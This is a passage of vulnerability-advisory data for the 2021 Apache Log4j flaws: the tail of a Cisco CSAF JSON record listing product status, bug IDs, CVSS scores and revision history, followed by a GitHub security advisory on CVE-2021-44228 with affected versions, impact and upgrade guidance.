vulnerable IMIcampaign Not vulnerable Not vulnerable IMIconnect Remediated Remediated IMIengage Not vulnerable Not vulnerable IMImessenger/TextLocal Messenger Not vulnerable Not vulnerable IMImobile - Webex Contact Center Integration Remediated Remediated IMInotify Not vulnerable Not vulnerable IMIsocial Not vulnerable Not vulnerable Kenna.AppSec Remediated Remediated Kenna.VI/VI+ Remediated Remediated Kenna.VM Remediated Remediated Meraki Not vulnerable Not vulnerable Partner Supporting Service(PSS) Remediated Remediated Slido Not vulnerable Not vulnerable Smart Call Home(SCH) Remediated Remediated Socio Not vulnerable Not vulnerable ThousandEyes Remediated Remediated UC-One - UMS Not vulnerable Not vulnerable", "title": "Products Confirmed Not Vulnerable" }, { "category": "general", "text": "Any workarounds are documented in the product-specific Cisco bugs, which are identified in the Vulnerable Products [\"#vp\"] section of this advisory.", "title": "Workarounds" }, { "category": "general", "text": "For information about fixed software releases, consult the Cisco bugs identified in the Vulnerable Products [\"#vp\"] section of this advisory.\r\n\r\nWhen considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.\r\n\r\nIn all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. 
If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.", "title": "Fixed Software" }, { "category": "general", "text": "To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy [\"https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html\"]. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.", "title": "Vulnerability Policy" }, { "category": "general", "text": "The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities described in this advisory.", "title": "Exploitation and Public Announcements" }, { "category": "general", "text": "These vulnerabilities were disclosed by the Apache Software Foundation.", "title": "Source" }, { "category": "legal_disclaimer", "text": "THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.\r\n\r\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. 
The information in this document is intended for end users of Cisco products.", "title": "Legal Disclaimer" } ], "publisher": { "category": "vendor", "contact_details": "psirt@cisco.com", "issuing_authority": "Cisco PSIRT", "name": "Cisco", "namespace": "https://wwww.cisco.com" }, "references": [ { "category": "self", "summary": "Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "category": "external", "summary": "Cisco Security Vulnerability Policy", "url": "https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html" }, { "category": "external", "summary": "Apache Log4j Security Vulnerabilities", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "Talos Rules 2021-12-21", "url": "https://www.snort.org/advisories/talos-rules-2021-12-21" }, { "category": "external", "summary": "Fixed Release Availability", "url": "https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html#fixes" }, { "category": "external", "summary": "CSCwa47283", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47283" }, { "category": "external", "summary": "CSCwa47272", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47272" }, { "category": "external", "summary": "CSCwa54008", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa54008" }, { "category": "external", "summary": "CSCwa47284", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47284" }, { "category": "external", "summary": "CSCwa46963", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46963" }, { "category": "external", "summary": "CSCwa47133", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47133" }, { "category": "external", "summary": "CSCwa47295", "url": 
"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47295" }, { "category": "external", "summary": "CSCwa48806", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48806" }, { "category": "external", "summary": "CSCwa47269", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47269" }, { "category": "external", "summary": "CSCwa48074", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48074" }, { "category": "external", "summary": "CSCwa47349", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47349" }, { "category": "external", "summary": "CSCwa47350", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47350" }, { "category": "external", "summary": "CSCwa48832", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48832" }, { "category": "external", "summary": "CSCwa47271", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47271" }, { "category": "external", "summary": "CSCwa47257", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47257" }, { "category": "external", "summary": "CSCwa49936", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49936" }, { "category": "external", "summary": "CSCwa49939", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49939" }, { "category": "external", "summary": "CSCwa47367", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47367" }, { "category": "external", "summary": "CSCwa51878", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51878" }, { "category": "external", "summary": "CSCwa47259", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47259" }, { "category": "external", "summary": "CSCwa49482", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49482" }, { "category": "external", "summary": "CSCwa47320", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47320" }, { "category": "external", "summary": "CSCwa47291", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47291" }, { "category": 
"external", "summary": "CSCwa47310", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47310" }, { "category": "external", "summary": "CSCwa47304", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47304" }, { "category": "external", "summary": "CSCwa47342", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47342" }, { "category": "external", "summary": "CSCwa47299", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47299" }, { "category": "external", "summary": "CSCwa47347", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47347" }, { "category": "external", "summary": "CSCwa52921", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52921" }, { "category": "external", "summary": "CSCwa50021", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50021" }, { "category": "external", "summary": "CSCwa47334", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47334" }, { "category": "external", "summary": "CSCwa49924", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49924" }, { "category": "external", "summary": "CSCwa47369", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47369" }, { "category": "external", "summary": "CSCwa47322", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47322" }, { "category": "external", "summary": "CSCwa47370", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47370" }, { "category": "external", "summary": "CSCwa47285", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47285" }, { "category": "external", "summary": "CSCwa52235", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52235" }, { "category": "external", "summary": "CSCwa48793", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48793" }, { "category": "external", "summary": "CSCwa47745", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47745" }, { "category": "external", "summary": "CSCwa47307", "url": 
"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47307" }, { "category": "external", "summary": "CSCwa47303", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47303" }, { "category": "external", "summary": "CSCwa47288", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47288" }, { "category": "external", "summary": "CSCwa50220", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50220" }, { "category": "external", "summary": "CSCwa47315", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47315" }, { "category": "external", "summary": "CSCwa51545", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51545" }, { "category": "external", "summary": "CSCwa47383", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47383" }, { "category": "external", "summary": "CSCwa47391", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47391" }, { "category": "external", "summary": "CSCwa47392", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47392" }, { "category": "external", "summary": "CSCwa46459", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46459" }, { "category": "external", "summary": "CSCwa47274", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47274" }, { "category": "external", "summary": "CSCwa47395", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47395" }, { "category": "external", "summary": "CSCwa47249", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47249" }, { "category": "external", "summary": "CSCwa47393", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47393" }, { "category": "external", "summary": "CSCwa46810", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46810" }, { "category": "external", "summary": "CSCwa47273", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47273" }, { "category": "external", "summary": "CSCwa47388", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47388" }, { "category": 
"external", "summary": "CSCwa47275", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47275" }, { "category": "external", "summary": "CSCwa46525", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46525" }, { "category": "external", "summary": "CSCwa47265", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47265" }, { "category": "external", "summary": "CSCwa47387", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47387" }, { "category": "external", "summary": "CSCwa47397", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47397" }, { "category": "external", "summary": "CSCwa51476", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51476" }, { "category": "external", "summary": "CSCwa47360", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47360" }, { "category": "external", "summary": "CSCwa47351", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47351" }, { "category": "external", "summary": "CSCwa47312", "url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47312" }, { "category": "external", "summary": "Remediated - service-specific details", "url": "https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability" } ], "title": "Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", "tracking": { "current_release_date": "2022-01-31T21:16:10+00:00", "generator": { "date": "2024-05-10T23:12:04+00:00", "engine": { "name": "TVCE" } }, "id": "cisco-sa-apache-log4j-qRuKNEbd", "initial_release_date": "2021-12-10T18:45:00+00:00", "revision_history": [ { "date": "2021-12-10T18:49:19+00:00", "number": "1.0.0", "summary": "Initial public release." }, { "date": "2021-12-10T20:58:15+00:00", "number": "1.1.0", "summary": "Added Snort rule link." }, { "date": "2021-12-11T00:58:43+00:00", "number": "1.2.0", "summary": "Added Products Under Investigation." 
}, { "date": "2021-12-11T19:15:38+00:00", "number": "1.3.0", "summary": "Indicated advisory update schedule. Updated the vulnerable products and products confirmed not vulnerable." }, { "date": "2021-12-11T23:12:24+00:00", "number": "1.4.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-12T15:01:39+00:00", "number": "1.5.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-12T18:11:59+00:00", "number": "1.6.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-12T19:02:40+00:00", "number": "1.7.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-12T23:05:52+00:00", "number": "1.8.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-13T15:31:38+00:00", "number": "1.9.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-13T20:34:26+00:00", "number": "1.10.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-13T23:43:56+00:00", "number": "1.11.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-14T15:42:33+00:00", "number": "1.12.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-14T19:36:34+00:00", "number": "1.13.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." 
}, { "date": "2021-12-14T23:57:07+00:00", "number": "1.14.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-15T15:08:09+00:00", "number": "1.15.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-15T19:27:33+00:00", "number": "1.16.0", "summary": "Updated the summary, products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-15T23:51:35+00:00", "number": "1.17.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-16T15:22:33+00:00", "number": "1.18.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-16T19:07:05+00:00", "number": "1.19.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-16T23:12:10+00:00", "number": "1.20.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-17T19:02:40+00:00", "number": "1.21.0", "summary": "Updated the summary, products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-18T00:07:30+00:00", "number": "1.22.0", "summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable." }, { "date": "2021-12-19T16:29:55+00:00", "number": "1.23.0", "summary": "Updated summary and products under investigation." }, { "date": "2021-12-20T20:29:03+00:00", "number": "1.24.0", "summary": "Updated vulnerable products and products confirmed not vulnerable." 
}, { "date": "2021-12-21T20:55:00+00:00", "number": "1.25.0", "summary": "Updated vulnerable products and products confirmed not vulnerable." }, { "date": "2021-12-22T20:47:44+00:00", "number": "1.26.0", "summary": "Updated vulnerable products and products confirmed not vulnerable. Updated the summary to indicate that no Cisco products are affected by CVE-2021-45105." }, { "date": "2021-12-22T22:58:15+00:00", "number": "1.27.0", "summary": "Updated vulnerable products." }, { "date": "2022-01-06T23:16:04+00:00", "number": "1.28.0", "summary": "Updated summary and vulnerable products." }, { "date": "2022-01-07T18:00:53+00:00", "number": "1.29.0", "summary": "Updated vulnerable products." }, { "date": "2022-01-10T18:01:02+00:00", "number": "1.30.0", "summary": "Updated vulnerable products." }, { "date": "2022-01-11T20:28:32+00:00", "number": "1.31.0", "summary": "Updated products confirmed not vulnerable." }, { "date": "2022-01-31T21:16:10+00:00", "number": "1.32.0", "summary": "Updated vulnerable products." 
} ], "status": "final", "version": "1.32.0" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_family", "name": "Cisco Unified Communications Manager IM and Presence Service", "product": { "name": "Cisco Unified Communications Manager IM and Presence Service ", "product_id": "CSAFPID-189784" } }, { "category": "product_family", "name": "Cisco Evolved Programmable Network Manager (EPNM)", "product": { "name": "Cisco Evolved Programmable Network Manager (EPNM) ", "product_id": "CSAFPID-213688" } }, { "category": "product_family", "name": "Cisco Network Services Orchestrator", "product": { "name": "Cisco Network Services Orchestrator ", "product_id": "CSAFPID-227765" } }, { "category": "product_family", "name": "Cisco Unified Communications Manager / Cisco Unity Connection", "product": { "name": "Cisco Unified Communications Manager / Cisco Unity Connection ", "product_id": "CSAFPID-277610" } } ], "category": "vendor", "name": "Cisco" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44832", "notes": [ { "category": "other", "text": "Complete.", "title": "Affected Product Comprehensiveness" } ], "product_status": { "known_affected": [ "CSAFPID-213688", "CSAFPID-227765", "CSAFPID-277610", "CSAFPID-189784" ] }, "remediations": [ { "category": "vendor_fix", "details": "Cisco has released software updates that address this vulnerability.", "product_ids": [ "CSAFPID-189784", "CSAFPID-213688", "CSAFPID-227765", "CSAFPID-277610" ], "url": "https://software.cisco.com" } ], "scores": [ { "cvss_v3": { "baseScore": 6.6, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "CSAFPID-213688", "CSAFPID-227765", "CSAFPID-277610", "CSAFPID-189784" ] } ], "title": "vuln-CVE-2021-44832" }, { "cve": "CVE-2021-45046", "ids": [ { "system_name": "Cisco Bug ID", "text": "CSCwa47310" }, { "system_name": "Cisco Bug ID", "text": "CSCwa56230" } ], "notes": [ { "category": "other", "text": "Complete.", 
"title": "Affected Product Comprehensiveness" } ], "product_status": { "known_affected": [ "CSAFPID-227765", "CSAFPID-277610", "CSAFPID-213688", "CSAFPID-189784" ] }, "remediations": [ { "category": "vendor_fix", "details": "Cisco has released software updates that address this vulnerability.", "product_ids": [ "CSAFPID-189784", "CSAFPID-213688", "CSAFPID-227765", "CSAFPID-277610" ], "url": "https://software.cisco.com" } ], "scores": [ { "cvss_v3": { "baseScore": 9.0, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "CSAFPID-227765", "CSAFPID-277610", "CSAFPID-213688", "CSAFPID-189784" ] } ], "title": "vuln-CVE-2021-45046" }, { "cve": "CVE-2021-44228", "ids": [ { "system_name": "Cisco Bug ID", "text": "CSCwa56230" } ], "notes": [ { "category": "other", "text": "Complete.", "title": "Affected Product Comprehensiveness" } ], "product_status": { "known_affected": [ "CSAFPID-277610", "CSAFPID-189784" ] }, "remediations": [ { "category": "vendor_fix", "details": "Cisco has released software updates that address this vulnerability.", "product_ids": [ "CSAFPID-189784", "CSAFPID-277610" ], "url": "https://software.cisco.com" } ], "scores": [ { "cvss_v3": { "baseScore": 10.0, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "CSAFPID-277610", "CSAFPID-189784" ] } ], "title": "Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021" }, { "cve": "CVE-2021-45105", "ids": [ { "system_name": "Cisco Bug ID", "text": "CSCwa56230" }, { "system_name": "Cisco Bug ID", "text": "CSCwa54650" }, { "system_name": "Cisco Bug ID", "text": "CSCwa47310" } ], "notes": [ { "category": "other", "text": "Complete.", "title": "Affected Product Comprehensiveness" } ], "product_status": { "known_affected": [ "CSAFPID-189784", "CSAFPID-213688" ] }, "remediations": [ { "category": "vendor_fix", "details": "Cisco has released 
software updates that address this vulnerability.", "product_ids": [ "CSAFPID-189784", "CSAFPID-213688" ], "url": "https://software.cisco.com" } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "CSAFPID-189784", "CSAFPID-213688" ] } ], "title": "Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021 (CVE-2021-45105)" } ] }
ghsa-jfh8-c2jp-5v3q
Vulnerability from github
Summary
Log4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser. As per Apache's Log4j security guide: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.
Log4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the Updated advice for version 2.16.0 section of this advisory.
Impact
Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input.
Affected versions
Any Log4J version prior to v2.15.0 is affected by this specific issue.
The v1 branch of Log4J, which is considered End Of Life (EOL), is vulnerable to other RCE vectors, so the recommendation is to still update to 2.16.0 where possible.
Security releases
Additional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3.
Affected packages
Only the org.apache.logging.log4j:log4j-core package is directly affected by this vulnerability. The org.apache.logging.log4j:log4j-api package should be kept at the same version as the org.apache.logging.log4j:log4j-core package to ensure compatibility if in use.
Remediation Advice
Updated advice for version 2.16.0
The Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which disables JNDI by default and completely removes support for message lookups. Even in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as CVE-2021-45046. More information is available on the GitHub Security Advisory for CVE-2021-45046.
Users who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must ensure that no such lookups resolve to attacker-provided data and ensure that the JndiLookup class is not loaded.
Please note that Log4j v1 is End Of Life (EOL) and will not receive patches for this issue. Log4j v1 is also vulnerable to other RCE vectors, and we recommend you migrate to Log4j 2.16.0 where possible.
{ "affected": [ { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "ranges": [ { "events": [ { "introduced": "2.13.0" }, { "fixed": "2.15.0" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "ranges": [ { "events": [ { "introduced": "2.0-beta9" }, { "fixed": "2.3.1" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "ranges": [ { "events": [ { "introduced": "2.4" }, { "fixed": "2.12.2" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "com.guicedee.services:log4j-core" }, "ranges": [ { "events": [ { "introduced": "0" }, { "last_affected": "1.2.1.2-jre17" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.xbib.elasticsearch:log4j" }, "versions": [ "6.3.2.1" ] }, { "package": { "ecosystem": "Maven", "name": "uk.co.nichesolutions.logging.log4j:log4j-core" }, "versions": [ "2.6.3-CUSTOM" ] } ], "aliases": [ "CVE-2021-44228" ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-400", "CWE-502", "CWE-917" ], "github_reviewed": true, "github_reviewed_at": "2021-12-10T00:40:41Z", "nvd_published_at": "2021-12-10T10:15:00Z", "severity": "CRITICAL" }, "details": "# Summary\n\nLog4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.\nAs per [Apache\u0027s Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. 
From log4j 2.16.0, this behavior has been disabled by default.\n\nLog4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the `Updated advice for version 2.16.0` section of this advisory.\n\n# Impact\n\nLogging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input. \n\n# Affected versions\n\nAny Log4J version prior to v2.15.0 is affected to this specific issue.\n\nThe v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible.\n\n## Security releases\nAdditional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3\n\n## Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\n# Remediation Advice\n\n## Updated advice for version 2.16.0\n\nThe Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which [disables JNDI by default and completely removes support for message lookups](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0).\nEven in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046). 
More information is available on the [GitHub Security Advisory for CVE-2021-45046](https://github.com/advisories/GHSA-7rjr-3q55-vv33).\n\nUsers who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must [ensure that no such lookups resolve to attacker-provided data and ensure that the the JndiLookup class is not loaded](https://issues.apache.org/jira/browse/LOG4J2-3221).\n\nPlease note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible.\n\n", "id": "GHSA-jfh8-c2jp-5v3q", "modified": "2024-07-25T20:12:08Z", "published": "2021-12-10T00:40:56Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "type": "WEB", "url": "https://github.com/apache/logging-log4j2/pull/608" }, { "type": "WEB", "url": "https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0" }, { "type": "WEB", "url": "https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup" }, { "type": "WEB", "url": "https://logging.apache.org/log4j/2.x/manual/migration.html" }, { "type": "WEB", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "type": "WEB", "url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2" }, { "type": "WEB", "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20211210-0007" }, { "type": "WEB", "url": "https://support.apple.com/kb/HT213189" }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "type": "WEB", "url": "https://twitter.com/kurtseifried/status/1469345530182455296" }, { "type": "WEB", "url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001" }, { "type": "WEB", "url": 
"https://www.debian.org/security/2021/dsa-5020" }, { "type": "WEB", "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html" }, { "type": "WEB", "url": "https://www.kb.cert.org/vuls/id/930724" }, { "type": "WEB", "url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-7rjr-3q55-vv33" }, { "type": "PACKAGE", "url": "https://github.com/apache/logging-log4j2" }, { "type": "WEB", "url": "https://github.com/cisagov/log4j-affected-db" }, { "type": "WEB", "url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md" }, { "type": "WEB", "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228" }, { "type": "WEB", "url": "https://github.com/tangxiaofeng7/apache-log4j-poc" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/LOG4J2-3198" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/LOG4J2-3201" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/LOG4J2-3214" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/LOG4J2-3221" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html" }, { "type": "WEB", "url": 
